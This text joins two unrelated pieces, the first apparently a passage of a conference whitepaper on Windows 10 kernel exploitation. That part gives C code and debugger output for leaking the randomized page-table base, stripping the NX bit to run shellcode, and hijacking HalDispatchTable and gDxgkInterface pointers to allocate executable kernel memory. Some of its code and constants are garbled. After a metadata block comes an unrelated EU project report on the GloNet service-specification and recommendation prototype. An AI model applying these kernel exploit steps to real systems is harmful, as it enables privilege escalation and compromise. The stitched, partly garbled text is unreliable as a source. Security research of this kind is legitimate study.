The idea is to find the address of MiGetPteAddress and read the randomized base address and use that instead of the previously static value. The first part can be achieved by leveraging the read primitive and locating the function address as described in the previous section. Having found the address of MiGetPteAddress, the base address of the Page Table Entries are at an offset of 0x13 bytes. This can be implemented as shown below:
```
VOID leakPTEBase(DWORD64 ntBase)
{
DWORD64 MiGetPteAddressAddr = locatefunc(ntBase, 0x247901102de0f798f, 0xb0000);
g_PTEBase = readQword(MiGetPteAddressAddr + 0x13);
return;
}
```
Next the address of the Page Table Entry of a given memory page can be found by the original method, only using the randomized base address.
```c
DWORD64 getPTfromVA(DWORD64 vaddr)
{
vaddr >>= 9;
vaddr &= 0x7FFFFFFF8;
vaddr += g_PTEBase;
return vaddr;
}
```
This may also be verified directly in memory, as shown in the example below for the memory address 0xFFFFF780000000000
```
kd> ? 0xffffffff780000000000 >> 9
Evaluate expression: 36028778765352960 = 007ffffffb`c0000000
kd> ? 007ffffffb`c0000000 & 7FFFFFFF8h
Evaluate expression: 531502202880 = 0000007b`c0000000
kd> dq 7b`c0000000 + 0FFFFFFFC00000000000h L1
f8fbcf7b`c0000000 80000000`00963963
```
If the shellcode is written to offset 0x800 of the KUSER_SHARED_DATA structure, which is still static in memory at the address 0xFFFFF780000000000, the updated method can be used to locate the Page Table Entry. Then the memory protection can be modified by overwriting the Page Table Entry to remove the NX bit, which is the highest bit.
```c
DWORD64 PteAddr = getPTfromVA(0xffffffff780000000000);
DWORD64 modPte = readQword(PteAddr) & 0x0FFFFFFF00000000;
writeQword(PteAddr, modPte);
```
Execution of the shellcode can be performed with known methods like overwriting the HalDispatchTable and then calling the user-mode API NtQueryIntervalProfile.
```c
XNU getProc(DWORD64 halDispatchTable, DWORD64 addr)
{
_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
writeQword(halDispatchTable + 8, addr);
ULONG result;
NtQueryIntervalProfile(0, &result);
return TRUE;
}
```
This technique de-randomizes the Page Tables and brings back the Page Table Entry overwrite technique.
Executable Memory Allocation
While modifying the Page Table Entry of an arbitrary memory page containing shellcode works, the method from Windows 7 of directly allocating executable kernel memory is neat. This section explains how this is still possible to obtain on Windows 10 Creators Update.
Many kernel pool allocations are performed by the kernel driver function ExAllocatePoolWithTag in ntoskrnl.exe. According to MSDN the function takes three arguments, the type of pool, size of the allocation and a tag value.
```c
VOID ExAllocatePoolWithTag(
_In_ POOL_TYPE PoolType,
_In_ SIZE_T NumberOfBytes,
_In_ ULONG Tag
);
```
Just as importantly on success the function returns the address of the new allocation to the caller. While NonPagedPoolNX is the new standard pool type for many allocations, the following pool types exist even on Windows 10.
```c
NonPagedPool = 0x0
NonPagedPoolExecute = 0x0
PagedPool = 0x1
NonPagedPoolMustSucceed = 0x2
NonUseThisType = 0x3
NonPagedPoolCacheAligned = 0x4
NonPagedPoolCacheAlignedMustS = 0x5
MaxPoolType = 0x7
NonPagedPoolBase = 0x0
NonPagedPoolBaseMustSucceed = 0x2
NonPagedPoolBaseCacheAligned = 0x4
NonPagedPoolBaseCacheAlignedMustS = 0x5
NonPagedPoolSession = 0x32
PagedPoolSession = 0x33
NonPagedPoolMustSucceedSession = 0x34
NonUseThisTypeSession = 0x35
NonPagedPoolCacheAlignedSession = 0x36
PagedPoolCacheAlignedSession = 0x37
NonPagedPoolCacheAlignedSession = 0x36
NonPagedPoolNx = 0x8
```
Specifying the value 0 as pool type will force an allocation of pool memory which is readable, writable and executable. Calling this function from user-mode can be done in the same way as shellcode memory pages are through NtQueryIntervalProfile. Sadly, to reach the overwritten entry in the HalDispatchTable specific arguments must be supplied, rendering the call to ExAllocatePoolWithTag invalid.
Another way of calling ExAllocatePoolWithTag is needed, the technique used by overwriting the HalDispatchTable could work for other user-mode functions if different function tables can be found. One such function table is gDxgkInterface which is in the kernel driver win32kbase.sys, the start of the function table is seen below.
Many functions use this function table, the requirements for the function we need is the following; it needs to be callable from user-mode, it must allow at least three user controlled arguments without modifications and it must be called rarely by the operating system or background processes to avoid usage after we overwrite the function table.
One function which matches these requirements is the user-mode function NtGdiDdDDICreateAllocation, which in dxgknl is called DxgkCreateAllocation and seen above at offset 0x68 in the function table. The user-mode function is not exportable, but only consists of a system call in win32u.dll. It is possible to implement the system call directly when using it, this is shown below
\[
\text{NtGdiDdDDICreateAllocation PROC}
\]
\[
\text{mov} \ r10, \ rcx
\]
\[
\text{mov} \ eax, \ 118\text{Ah}
\]
\[
\text{syscall}
\]
\[
\text{ret}
\]
\[
\text{NtGdiDdDDICreateAllocation ENDP}
\]
When the system call is invoked it gets transferred to the kernel driver win32k.sys which dispatches it to win32kfull.sys, which in turn dispatches it to win32kbase.sys. In win32kbase.sys the function table gDxgkInterface is referenced and a call is made to offset 0x68. The execution flow can be seen below
All the involved drivers only implement very thin trampolines around the system call. The consequence is that no arguments are modified, which was the second requirement for. When performing testing an overwrite of the DxgkCreateAllocation function pointer does not cause any unintended problems due to additional calls, which was the third and final requirement.
To use NtGdiDdDDICreateAllocation and the gDxgkInterface function table, the latter must be writable. Inspecting the Page Table Entry is seen below
While the content of the Page Table Entry may be hard to interpret directly, it can be printed according to the structure _MMPTE_HARDWARE and shows the function table to be writable:
```
k> dt _MMPTE_HARDWARE ffffc7f\’548ef570
nt\_MMPTE\_HARDWARE
+0x000 Valid : 0y1
+0x000 Dirty1 : 0y1
+0x000 Owner : 0y0
+0x000 WriteThrough : 0y0
+0x000 CacheDisable : 0y0
+0x000 Accessed : 0y1
+0x000 Dirty : 0y1
+0x000 LargePage : 0y0
+0x000 Global : 0y0
+0x000 CopyOnWrite : 0y0
+0x000 Unused : 0y0
+0x000 Write : 0y1
+0x000 PageFrameNumber : 0\x0000000000000000110110101010000000000000
+0x000 reserved1 : 0y0000
+0x000 SoftwareVsIndex : 0y100111110110 (0x4f6)
+0x000 NoExecute : 0y1
```
In principle, all the elements needed are in place, the idea is to overwrite the function pointer DxgkCreateAllocation at offset 0x68 in the function table gDxgkInterface with ExAllocatePoolWithTag followed by a call to NtGdiDdDDICreateAllocation specifying NonPagedPoolExecute as pool type. The remaining practical issue is locating the gDxgkInterface function table. We have several KASLR bypasses to locate the base address of ntoskrnl.exe, but so far, no ways to find other drivers.
The structure PsLoadedModuleList in ntoskrnl.exe contains the base address of all loaded kernel modules, thus finding other kernel drivers in memory is possible. The structure of the doubly-link list given by PsLoadedModuleList is shown below:
```
k> dq nt\!PsLoadedModuleList L2
fff8003'4c7e5a50 fff8003'30c1e530 fff800a'3a347e80
k> dt nt\_IDR\_DATA\_TABLE\_ENTRY fff8003'30c1e530
ntdll\!IDR\_DATA\_TABLE\_ENTRY
+0x000 InLoadedOrderLinks : _LIST_ENTRY [ 0fff8003'30c1e530 - 0fff8003'4c7e5a50 ]
+0x010 InMemoryOrderLinks : _LIST_ENTRY [ 0fff8003'4c7e5a50 - 0x00000000'00053760 ]
+0x020 InInitializationOrderLinks : _LIST_ENTRY [ 0x00000000'00000000 - 0x00000000'00053760 ]
+0x030 DLLBase : 0fff8003'4c41e000 Void
+0x038 EntryPoint : 0fff8003'4c61e010 Void
+0x040 SizeOfImage : 0x00000000
+0x044 FullDllName : _UNICODE STRING "\SystemRoot\system32\ntoskrnl.exe"
+0x058 BaseDllName : _UNICODE STRING "ntoskrnl.exe"
```
Thus, iterating through the linked list until the correct name in offset 0x60 is found will allow for reading the base address at offset 0x30.
Locating the PsLoadedModuleList structure directly using the previously mentioned algorithm to find function addresses does not work since this is not a function, but just a pointer. A lot of functions use the structure so it is possible to find the pointer from one of these.
KeCapturePersistentThreadState in ntoskrnl.exe uses PsLoadedModuleList which can be seen below
It is possible to use the function finding algorithm to locate KeCapturePersistentThreadState and then dereference PsLoadedModuleList, which in turn will give the base address of any loaded kernel module.
While getting the base address of win32kbase.sys is possible, the problem of locating the function table gDxgkInterface is the same as finding the PsLoadedModuleList pointer. A better approach is finding a function which uses the function table and then read the address of gDxgkInterface from that.
One viable function is DrvOcclusionStateChangeNotify in the kernel driver win32kfull.sys, which has the disassembly shown below
```
DrvOcclusionStateChangeNotify proc near
var_18 = dword ptr -18h
var_10 = dword ptr -10h
; FUNCTION CHUNK AT 00000001C0157D2E SI:
sub rsp, 38h
mov rax, [rsr+36h]
lea rcx, [rsp+38h+var_18]
mov [rsp+38h+var_10], rax
mov rax, cs:_imp_?gDxgkInterface@@QAE
mov [rsp+38h+var_18], 1
mov rax, [rax+408h]
```
From this function pointer, the function table can be found, which allows for overwriting the DxgkCreateAllocation function pointer with ExAllocatePoolWithTag.
Following the pool allocation, the shellcode can be written to it using the kernel-mode write primitive. Finally, the gDxgkInterface function table can be overwritten again with the pool address followed by an additional call to NtGdiDdDDICreateAllocation.
```c
writeShellcode(poolAddr);
writeQword(gDxgkInterface + 0x68, poolAddr);
NtGdiDdDDICreateAllocation(gDxgkInterface + 0x68, DxgkCreateAllocation, 0, 0);
```
The arguments for the NtGdiDdDDICreateAllocation function call is the address of DxgkCreateAllocation and its original place in the function table. This allows the shellcode to restore the function pointers in the function table, thus preventing any future calls to NtGdiDdDDICreateAllocation crashing the operating system.
|
{"Source-Url": "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Morten-Schenk-Taking-Windows-10-Kernel-Exploitation-to-the-next-level-Leveraging-vulns-in-Creators-Update-WP.pdf", "len_cl100k_base": 13149, "olmocr-version": "0.1.53", "pdf-total-pages": 29, "total-fallback-pages": 0, "total-input-tokens": 48692, "total-output-tokens": 16706, "length": "2e13", "weborganizer": {"__label__adult": 0.0003936290740966797, "__label__art_design": 0.0004203319549560547, "__label__crime_law": 0.0006284713745117188, "__label__education_jobs": 0.00032329559326171875, "__label__entertainment": 0.0001093149185180664, "__label__fashion_beauty": 0.00014781951904296875, "__label__finance_business": 0.00025010108947753906, "__label__food_dining": 0.0002741813659667969, "__label__games": 0.0015249252319335938, "__label__hardware": 0.005321502685546875, "__label__health": 0.0002703666687011719, "__label__history": 0.00030231475830078125, "__label__home_hobbies": 0.00010901689529418944, "__label__industrial": 0.0004596710205078125, "__label__literature": 0.00026988983154296875, "__label__politics": 0.0002753734588623047, "__label__religion": 0.0004453659057617187, "__label__science_tech": 0.06646728515625, "__label__social_life": 5.751848220825195e-05, "__label__software": 0.042083740234375, "__label__software_dev": 0.87890625, "__label__sports_fitness": 0.00018513202667236328, "__label__transportation": 0.0003783702850341797, "__label__travel": 0.0001646280288696289}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50582, 0.09301]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50582, 0.8591]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50582, 0.7884]], "google_gemma-3-12b-it_contains_pii": [[0, 1723, false], [1723, 3181, null], [3181, 5296, null], [5296, 8273, null], [8273, 10694, null], [10694, 12503, null], [12503, 13907, null], [13907, 16761, null], [16761, 18254, null], [18254, 19162, null], [19162, 21101, null], [21101, 23394, null], [23394, 23887, null], [23887, 26426, null], [26426, 28430, null], [28430, 29697, null], [29697, 31657, null], [31657, 32352, null], [32352, 34409, null], [34409, 35241, null], [35241, 35718, null], [35718, 38215, null], [38215, 40372, null], [40372, 42138, null], [42138, 44344, null], [44344, 46094, null], [46094, 48697, null], [48697, 49839, null], [49839, 50582, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1723, true], [1723, 3181, null], [3181, 5296, null], [5296, 8273, null], [8273, 10694, null], [10694, 12503, null], [12503, 13907, null], [13907, 16761, null], [16761, 18254, null], [18254, 19162, null], [19162, 21101, null], [21101, 23394, null], [23394, 23887, null], [23887, 26426, null], [26426, 28430, null], [28430, 29697, null], [29697, 31657, null], [31657, 32352, null], [32352, 34409, null], [34409, 35241, null], [35241, 35718, null], [35718, 38215, null], [38215, 40372, null], [40372, 42138, null], [42138, 44344, null], [44344, 46094, null], [46094, 48697, null], [48697, 49839, null], [49839, 50582, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 50582, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 50582, null]], "pdf_page_numbers": [[0, 1723, 1], [1723, 3181, 2], [3181, 5296, 3], [5296, 8273, 4], [8273, 10694, 5], [10694, 12503, 6], [12503, 13907, 7], [13907, 16761, 8], [16761, 18254, 9], [18254, 19162, 10], [19162, 21101, 11], [21101, 23394, 12], [23394, 23887, 13], [23887, 26426, 14], [26426, 28430, 15], [28430, 29697, 16], [29697, 31657, 17], [31657, 32352, 18], [32352, 34409, 19], [34409, 35241, 20], [35241, 35718, 21], [35718, 38215, 22], [38215, 40372, 23], [40372, 42138, 24], [42138, 44344, 25], [44344, 46094, 26], [46094, 48697, 27], [48697, 49839, 28], [49839, 50582, 29]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 50582, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
54c46d7ad2a087c7a02bd932b694d6d2d31057b7
|
D4.4 Prototype of the system for enhanced services recommendation
Sargolzaei, M.; Shafahi, M.; Afsarmanesh, H.
DOI
10.13140/RG.2.1.3697.4242
Publication date
2014
Document Version
Final published version
Citation for published version (APA):
Glocal enterprise network
focusing on customer-centric collaboration
D4.4
Prototype of the system for enhanced services recommendation
Edited by
UvA
September 2014
Project funded by the European Commission under the
ICT – Factories of the Future Programme
Contract Start Date: 1 Sep 2011 Duration: 42 months
GloNet WP4
CUSTOMIZED SERVICE-ENHANCED PRODUCT SPECIFICATION
Deliverable data
<table>
<thead>
<tr>
<th>Deliverable no & name</th>
<th>D4.4 – Prototype of the system for enhanced services recommendation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Main Contributors</td>
<td>UvA: Mahdi Sargolzaei, Mohammad Shafahi, Hamideh Afsarmonesh</td>
</tr>
<tr>
<td>Other Contributors</td>
<td></td>
</tr>
<tr>
<td>Internal Reviews</td>
<td>Luis Camarinha-Matos (Uninova), Victor Thamburaj (iPLON)</td>
</tr>
<tr>
<td>Dissemination level</td>
<td>Public</td>
</tr>
<tr>
<td>Date</td>
<td>September 2014</td>
</tr>
<tr>
<td>Status</td>
<td>Final</td>
</tr>
</tbody>
</table>
Deliverable summary
This deliverable addresses the prototypes of two tools that are implemented as a part of the PSS sub-system in the GloNet system, namely the Service Specification Tool (SST) and Product/Service Discovery and Recommendation (PSDR) tool. The designs of these tools are represented in the deliverable D4.3. These two tools, as well as the Product Specification Tool (PST) represented in D4.1 and D4.2, are well integrated as PSS (Product and Service Specification), supporting proper specification of different aspects of the complex products. The PSS sub-system provides the set of needed mechanisms for specification, registration, discovery, and recommended ranking of sub-products and business services, as well as the composition of business services and assisting with the enhancement for products with business services. As such, this deliverable addresses the implementation aspects related to the service-enhanced product specification and recommendation, while the complete design of the functionalities for this sub-system is provided in deliverable D4.3. Moreover, a set of examples of using the SST and PSDR tools, with some screenshots from the PSS are represented.
TABLE OF CONTENTS
PROJECT-RELATED SUMMARY .......................................................................................................... 4
1 INTRODUCTION ............................................................................................................................... 6
2 IMPLEMENTATION APPROACHES and DETAILS ....................................................................... 8
2.1 General architecture ......................................................................................................................... 8
2.2 Data Model ........................................................................................................................................ 10
2.3 Integration of PSS with the other sub-systems of GloNet .............................................................. 11
3 PSS- USING PRODUCT/SERVICE SPECIFICATION SUB-SYSTEM – Focused on SST and PSDR tools ........................................................................................................................................... 13
4 SST and PSDR TOOLS ................................................................................................................. 16
4.1 Adding a new service specification .................................................................................................. 16
4.2 Adding a new feature-kind .............................................................................................................. 19
4.3 Adding a new unit ............................................................................................................................ 19
4.4 Adding new classes .......................................................................................................................... 20
4.5 Viewing / managing existing product specifications ......................................................................... 20
4.6 Sending a Launch Request ............................................................................................................ 22
4.7 PSDR- Discovering of Services ....................................................................................................... 24
4.8 PSDR- Discovering of products ..................................................................................................... 25
5 CONCLUDING REMARKS ............................................................................................................. 27
6 REFERENCES ................................................................................................................................ 28
ANNEX I- AN EXAMPLE SCENARIO AS A GUIDELINE FOR THE PSS ............................................ 29
PROJECT-RELATED SUMMARY
This deliverable (D4.4) is the fourth deliverable of WP4 that designs and develops the PSS (product/service specification) sub-system of the GloNet, and plays a main role for interconnecting the PST (product specification tool), SST (service specification tool) development of WP4 to other workpackages, and mainly WP5 and WP3. The D4.4 is the outcome of Task 4.4, and represents a detailed implementation report of several base functionalities that support the specification of business services within the complex product, and also potentially as enhancement for the specified products by their designers. The product specification functionalities have already been designed and developed, as described in the previous deliverables D4.2 and D4.3.
The deliverable D4.4 addresses the last major step in complex product specification, namely the customized service-enhanced product specification. Findings reported in deliverables: D1.1 (“Detailed requirements for GloNet use case and domain glossary”) [1], D1.2 (“Specification of business scenarios”) [2], D2.1 (“Required information/knowledge provision services specification”) [3], D2.4 (“Mechanisms for defining composed services to support collaboration”) [4], D4.1 (“Design report on approach and mechanism for effective customized complex product specification”) [5], and D4.2 (“Prototype of Services supporting iterative complex product specification”) [6] constitute the background for complex product specification addressed in this deliverable. However, the designed mechanisms and approaches addressed in D4.3 (“Report on dynamically customizable services enhancing products”) [7] which were designed in Task 4.3, constitute the main input and the base for this deliverable. In fact, this deliverable aims at the Prototype developed for the tools designed and presented in D4.3, namely the Service Specification Tool (SST) and the Product/Service Discovery and Recommendation tool (PSDR). Furthermore, as addressed in the deliverable, SST and PSDR are also integrated with the Product Specification Tool (PST, addressed in D4.1 and D4.2). The three tools PST, SST, and PSDR together form the Product/Service Specification (PSS) sub-system of the GloNet, which supports iterative complex service-enhanced product specification.
The specifications generated for complex products in PSS then provides an input to product portfolio sub-system addressed in D4.5 “Design and prototype of product portfolio system”. The following figure summarizes different tasks and deliverables of WP4.
It is important to notice that similar to PST, the developments of SST and PSDR addressed in this deliverable play an important role in the success of functionalities addressed especially in WP5. This is due to the fact that the specifications generated by stakeholders using the developed product/service specification sub-system (PSS) of WP4, constitute a main input for identification of needed competencies from organizations, and thus selection of most-fit organizations in the VO creation process, as addressed in D5.22.
This deliverable provides a number of screenshots from the product/service specification (PSS) sub-system and is more focused on SST and PSDR.
1 INTRODUCTION
Complex products addressed in the GloNet, namely the solar power plants and intelligent buildings, are examples of products that are one of a kind in their design specifications, while they benefit from the reuse of already existing sub-specifications, and tailoring some previously specified designs to what exactly fits each specific complex product case.
Our requirement analysis of the GLONET in D1.1 [1] revealed that such complex products require supporting tools and systems for detailed specifications. Furthermore, complex products are dynamic and therefore the supporting tools for specification of products and services are needed to be used at different stages of the Product Life Cycle (PLC) of these complex products [7], [8]. Besides heavily being used during the design and engineering stage of the PLC, they are also needed infrequently during the operation/evaluation stage of the PLC, as well as during the pre-PLC phase of preparing the bid for the complex product. Please also note that the specification of a complex product including its sub-product specifications and business service specifications, is typically performed iteratively in a number of sessions, and potentially involving a number of different stakeholders at each time, who may collaborate to specify different components (sub-product and service) of the complex product. In fact, complex products specification is mostly done by some consulting or EPC (Engineering, Procurement, and Construction) companies in interaction with the customer. Several other stakeholders however (e.g. product and equipment providers, component developers, and business service providers) might also be involved in the VBE community around the complex product and will use the specification tool to provide the details of their products and services and to create awareness about them. Therefore, around each complex product, a variety of stakeholders (e.g. designers, manufactures, EPC staff, customers, etc.) can join together and form a Design Group to specify this complex product, and therefore should be supported in the GloNet.
As addressed in [7], the Product/Service Specification (PSS) sub-system consists of three main sets of tools, as also indicated in Figure 1 under the service-enhanced product support header. These include: the Product Specification & Registration Tool (PST), the Service Specification & Registration Tool (SST), and finally the Product/Service Discovery & Recommendation Engine (PSDR).
Details related to the first tool, i.e. the Product Specification & Registration (PST) on its design and development are respectively provided in [5] and [6]. In [7], We have discussed the design of the other two tools SST & PSDR and addressed their needed functional and non-functional requirements, as well as our proposed approaches to realize them. Finally, in this deliverable, the implementation and development aspects of the last two tools are reported.
Since the design of SST and PSDR prototypes have been detailed out previously (in [7]), in this document we only revisit some design aspects briefly when and if necessary to extend/augment the original design. As described in [7], each business service is materialized either manually through human activities (which we call Manual tasks), or automatically through some software (which we call Software services). The SST tool covers the specification of both of these kinds of business services, as well as the combination of some manual tasks and software services, called Composite services, as further addressed in this document.
Also it is important to note that the realizations of the non-functional requirements of the SST and PSDR (addressed in [7]), including security, scalability, availability, etc. are also supported similar to the non-functional requirements realization, of the PST, which is addressed in [6]. Therefore, we have not addressed these aspects here to avoid repetition.
The following sections of this document provide more details on certain important implementation aspects related to the service specification system, and product/service discovery and recommendation, structured in the next two sections. Section 2 addresses the implementation approach, and section 3 and 4 describe and provide examples for the use of the product/service specification sub-system. Some concluding remarks are provided in Section 5. Also in the Annex of this document, we have provided an example scenario for the use of the entire PSS sub-system of GloNet.
2 IMPLEMENTATION APPROACHES AND DETAILS
The product/service specification (PSS) sub-system is implemented in Java programming language, using the Spring [9] and Hibernate [10] framework. We have used Eclipse as the IDE (Integrated Development Environment) for our programming. Its database is built using the GloNet platform, and the MySQL [11] database management system.
In the remaining of this section, we will describe the technical details of the approach, as well as the technologies that are used to implement this sub-system of the GloNet.
2.1 General architecture
The general architecture for the implementation of the PSS is based on the MVC (Model–View–Controller) software design pattern [8], which enables modular development of this software's sub-systems. Please note that this architecture is a slightly extended version of the PSS architecture presented in [6]. While the original architecture of PSS addressed the PST (product specification tool), the extension here also covers the development of SST (service specification tool) and PSDR (product/service discovery and recommendation). Therefore, figure 2 also represents the new elements added to the entities and DAOs layers. These extensions are illustrated with boxes having text in color black. Nevertheless, the following text addresses all elements of the generated architecture that are reflected in the development of the SST and PSDR tools of each layer.

Figure 2 represents the MVC-based architecture of the PSS sub-system, where it consists of five layers, as briefly described below.
1. **Entities:**
This layer consists of the main entities introduced in the PSS sub-system, these entities are: Service, Request, Product, Object Class, PRODCOM Class-code, Organization, Class, FeatureKind, Feature, and unit. Also figure 3 shows the extended Class diagram cardinality of inter-relationships among the entity sets for the PSS sub-system indicated through the addition Product Portfolio and PRODCOM Class-code in the diagram.
The Service entity represents all business Services (being manual or a software service), which can be defined in the PSS. The Organization entity briefly characterizes the organization/User who participates in the service specification process as a member of the Design Group. The Feature-kind entity represents all different kinds of features that can be defined in this sub-system within the Context of SST and PSDR. The Feature entity, characterizes different aspects of the business service, and extends every Feature-kind with its value, while the Unit entity specifies the scale for that value. The Request entity is the class representing the request for launching of a service (e.g. the composite site maintenance service in a Solar Plant, as addressed in details in [7]). The Class entity represents the generalization of the Services.
2. **DAOs (Data Access Object):**
DAO layer consists of the set of interfaces that represent the base operations developed for accessing every one of the entities defined in the lower layer, and enforces that the higher layer implementations in the PSS access all of these entities only through these provided minimum interfaces. In fact, DAO layer allows the using of entities, independent from both the technologies and the data sources.
3. **DAOs’ implementation:**
This layer implements the DAOs addressed in the previous layer, through providing access to each of the defined entities at the entity layer, e.g. access to the organization entity. We have implemented this layer using some web services developed on top of the GloNet.
platform. Moreover, The DAO implementation provides Hibernate-based access to the MySql database through the cloud, e.g. to access the product/service and feature specifications.
4. Controllers:
This layer handles the interactions between the users (human or software) and the sub-system, through two separate sets of controller components: (i) the web service interactions (i.e. by software) and (ii) the web interface interactions (i.e. by human).
5. Views:
The Views layer represents a set of different interfaces on the exchanged data/information between the PSS and its users, which are either software system or human. This layer benefits from some technologies and standards for the user interface of the PSS including the HTML, JSON, AJAX, JQuery and XML. While HTML is used for the human interactions, XML and JSON are used for interaction with software systems. The AJAX technology and the JQuery framework are deployed to produce a smooth and interactive experience for the user.
Please note that [7] provides detailed description of the role played by PRODCOM codes in relation to product/service classes in PSS.
Also the integration of PSS with product portfolio as addressed in the next section, has required the representation of the relation between the Request entity and the name associated with the request in product portfolio.
More details about the implementation architecture of this sub-system and its main components, which are presented in figure 7, are described already in the deliverable [6].
2.2 Data Model
There are two main types of data entities in the PSS sub-system of GloNet, including the Products and Services of complex products. The data model for the products is already described in details in [5] and [6]. Figure 4 represents an entity–relationship model (an ER diagram) [12] as the data model for describing the different aspects of the business services in the PSS.
This ER diagram shows the relationships among meta-data elements for service specification tool (SST), and their cardinalities. It represents the relation between the enhancing services of sub-products and the other entities defined in the PSS according to the Entities layer of its general architecture (figure 3).
2.3 Integration of PSS with the other sub-systems of GloNet
The PSS sub-system is integrated with other sub-systems of the GloNet system. Below is a brief description of this integration process for the SST and PST parts of the PSS with other GloNet sub-systems. Figure 5 shows the integration links between the PSS and other sub-systems of the GloNet.
i. Integration with GloNet platform: The PSS sub-systems connect to the GloNet platform for accessing to the list of VBE members and to authenticate the users of PSS, through its single sign on feature. Furthermore, during the service specification process, the SST tool gains access to Process Descriptions (Workflows) defined by the user related to specification of a business service, which are captured in the platform. These workflows are designed using the BPMN Modeler software, and uploaded in the platform.
ii. Integration with Product Portfolio: The PSS creates a Product Portfolio instance in the Product Portfolio system, and assign a customer to it. Finally, the PSS stores an instance of the product or service specifications in the Product Portfolio.
iii. Integration with VO formation: The PSS can send a request for launching a VO, which starts the configuration/formation process of a VO corresponding to the specified service or product.
Figure 5- The integration of the PSS sub-system with the other components of the GloNet system
3 PSS – USING PRODUCT/SERVICE SPECIFICATION SUB-SYSTEM
– Focused on SST and PSDR tools
This section provides some examples and snapshots from running the service specification tool (SST), and the Product/Service Discovery and Recommendation (PSDR) while illustrating the final interfaces developed for use of these tools. The development has addressed specifically the functional/non-functional requirements addressed in details in [7]. As such, specific emphasis has been put on developing the needed data manipulation operations, i.e. Add, View, and Duplicate, on: services, classes, feature-kinds, and units.
Figure 6 shows the login form of SST (and other PSS tools) to authorize and authenticate users, which can be used only when the tool is used as a standalone tool, outside the GloNet. However, in case of login through the GloNet platform, the GloNet system authenticates the user, and thus the PSS sub-system can receive the single-sign on token provided through the GloNet platform. As such, in those cases, this login step will be bypassed.

Figures 7 show the first view of the PSS, which provides access to PST, SST, and PSDR tools, after user has logged in. Below is a screenshot of the general view (header and menus) of the PSS sub-system, as also presented before in [6].
.13
• On the top right, the name of the user (who is logged in) is indicated. There is a sub-menu developed under the user name to view the user profiles, system status and finally a link to log out from the system. The user name is next to the name of the Design Group in which the user is working. Definition of the Design Group assists the user to better organize his/her design specifications, and provides the possibility of switching between different projects. Moreover, his/her partners in the design groups can contribute to the specification of the corresponding services and products.
Please note that when the Design Group is set to Private (as in Fig. 7), the user works only on his/her private space, without any other partner. As figure 8 shows, the user can also indicate another Design Group in the sub-menu, involving other partners in product/service specifications.
The Design Group name appears next to the name of My Directory. This option provides the possibility to assign different users the needed access right to the defined service specifications. This is mainly used to assist the user with organizing his/her own service specification folders/directories.
• On the left side, three tools (PST, SST and PSDR) developed in the PSS sub-system of GloNet, and their main functionalities are represented, each opening a set of menu items. These give access to different functionalities related to specification of sub-products (PST), specification of services (SST) and Discovery of products and services (PSDR), which are described further below and in the following sub-sections.
• In the center, a data entry space for the tools (SST, PST, or PSDR) is represented according to the called functionality, selected from the left side.
• On the right side, a number of suggestions may be represented, to help the user with the specification processes. These include suggestions of related classes, suitable sub-products, recommended enhancing services for sub-products, and suggested features, that can be used by the designer in his/her design. These suggestions are described further in the following sections.
Figure 8 – Design Group menu
4 SST AND PSDR TOOLS
Under the service Specifications tool (SST) menu, there are two sub-menus: Add, and Existing candidates. The user, through the Existing candidates link, is able to view the Existing service Specifications. The list of specified services is provided with their names, classes, and a drop-down list of icons (on their right) representing different actions that can be performed on them, as described later. Here we first describe different features supported by the SST and PSDR in the remaining of this section, and further illustrate their functionalities with some screenshots of these developed tools.
4.1 Adding a new service specification
Figure 9 shows the snapshot of the interface window for SST, where the Add sub-menu is selected from the menu under the service Specifications (SST). This window is used to support specifying a new atomic and/or composite business service. As such, this interface can be used to specify/register/add a new business service at any level of abstraction and granularity.
To simplify the labeling of presentations in this section, this interface window is called “New Service” form. In the New Service window, the user can add an atomic/composite service specification by first providing a unique name for the service. The user can then optionally define one or more classes for the specified service.
Once the user, who is specifying a service, defines a class for it (e.g. the class “Atomic Service”) through the system all the features defined for that specific class will automatically pop up in this window. As such, the user is assisted with receiving the names of all features, which he/she should fill and specify as a part of the specification of that service. Furthermore, while providing input for some of those features might be optional, some other features of the class might be mandatory, which would then oblige the user to provide the needed input.
For example, in Figure 9 since the user has added the class “Atomic Service”, for the service which he/she is specifying, a set of feature-kinds for this service have automatically popped up in the center of the New Service specification form (figure 9), for its further specification. These include the mandatory set of feature-kinds, such as “Context”, “capabilities”, and “Response time”, which show up automatically on the screen. It is important to note here that providing input value (i.e. features) for these feature-kinds are obligatory (as marked with “*”). Therefore the user is obliged to define the value and unit for these features.
